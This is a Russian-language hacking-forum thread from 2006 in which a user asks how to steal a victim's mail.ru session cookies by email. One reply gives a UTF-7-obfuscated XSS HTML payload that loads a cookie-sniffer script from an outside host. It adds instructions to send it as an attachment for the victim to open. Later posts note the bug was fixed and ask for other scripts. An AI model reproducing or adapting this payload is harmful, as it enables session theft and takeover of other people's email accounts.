PDA

Просмотр полной версии : Обясните


Chumak
29.10.2006, 18:54
Пожалуйста напишите что надо отправить на мэйл врага чтоб на сниффер пришли cookie.
Со вставлением cookie в браузер я знаком...
А что отпрвлть не знаю!
Буду оч благодарен!

Chumak
30.10.2006, 13:48
Ну пожалуйста!!!

-Concord-
30.10.2006, 14:05
Не понял.... ты чё статью не читал? или что тебе объяснить то ... тебе надо отправить хтмл страничку с кодом снифера

Chumak
30.10.2006, 14:53
Не понял.... ты чё статью не читал? или что тебе объяснить то ... тебе надо отправить хтмл страничку с кодом снифера

Читал вот тока я не понял что надо отправлять в хтмл файле??

Sn@k3
30.10.2006, 16:21
а это случаем не майл ру? хе

Chumak
30.10.2006, 17:03
Случаем да!

bxN5
30.10.2006, 17:29
Если ты посмотрел видео XSS на mail.ru то знаю багу давно пофиксили
Ну вот если не знал то етот скриптик <html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7">
<TABLE><TD BACKGROUND="+ACYAIw-106+ACYAIw-97+ACYAIw-118+ACYAIw-97+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116: document.write('+ACYAIw-60+ACYAIw-115+ACYAIw-99+ACYAIw-114+ACYAIw-105+ACYAIw-112+ACYAIw-116 SRC=http://devarsiv.org/alex/j.js> </SCRIPT>')">
</html>
http://devarsiv.org/alex/j.js> ето и есть ссылка на твой сниффер
Етот код надо было скопировать в блокнот и сохранить с расширением html, и отправить как прикрепленный файл, жертва должна была его открыть и тебе пришли бы куки на сниффер.Про подмену куков ето уже другая история юзай поиск.

Chumak
30.10.2006, 17:39
"Если ты посмотрел видео XSS на mail.ru то знаю багу давно пофиксили
Ну вот если не знал то етот скриптик"
Этот скрипт отправлял в виде html....Но на снифер ниче не пришло (я не знал что пофиксили)...Спасибо что просветил..
А нет другого скрипта?

bxN5
30.10.2006, 17:47
Я о таком не зняю(

Майор
30.10.2006, 19:16
я думаю вряли кто тебе здесь отпишет активную XSS на mail.ru , потому что её тут же прикроют